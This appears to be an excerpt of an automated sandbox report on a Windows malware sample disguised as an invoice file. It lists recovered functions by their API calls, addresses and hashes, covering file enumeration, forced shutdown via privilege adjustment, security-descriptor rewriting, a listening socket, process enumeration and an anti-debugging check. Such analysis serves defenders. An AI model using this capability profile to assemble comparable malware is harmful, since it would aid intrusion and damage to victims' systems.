                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1409584000-438819550
                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                • __swprintf.LIBCMT ref: 00431C2E
                                • _wcslen.LIBCMT ref: 00431C3A
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                • String ID: :$\$\??\%s
                                • API String ID: 2192556992-3457252023
                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                • __swprintf.LIBCMT ref: 004722B9
                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FolderPath$LocalTime__swprintf
                                • String ID: %.3d
                                • API String ID: 3337348382-986655627
                                • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                • FindClose.KERNEL32(00000000), ref: 00442930
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 2640511053-438819550
                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                • GetLastError.KERNEL32 ref: 00433414
                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                • String ID: SeShutdownPrivilege
                                • API String ID: 2938487562-3733053543
                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                APIs
                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                • String ID:
                                • API String ID: 1255039815-0
                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                APIs
                                • __swprintf.LIBCMT ref: 00433073
                                • __swprintf.LIBCMT ref: 00433085
                                • __wcsicoll.LIBCMT ref: 00433092
                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                • LockResource.KERNEL32(?), ref: 00433120
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                • String ID:
                                • API String ID: 1158019794-0
                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                • GetLastError.KERNEL32 ref: 0045D6BF
                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove$_strncmp
                                • String ID: @oH$\$^$h
                                • API String ID: 2175499884-3701065813
                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLast$closesocket$bindlistensocket
                                • String ID:
                                • API String ID: 540024437-0
                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                • API String ID: 0-2872873767
                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                • __wsplitpath.LIBCMT ref: 00475644
                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                • _wcscat.LIBCMT ref: 00475657
                                • __wcsicoll.LIBCMT ref: 0047567B
                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                • String ID:
                                • API String ID: 2547909840-0
                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                • FindClose.KERNEL32(?), ref: 004525FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                • String ID: *.*$\VH
                                • API String ID: 2786137511-2657498754
                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
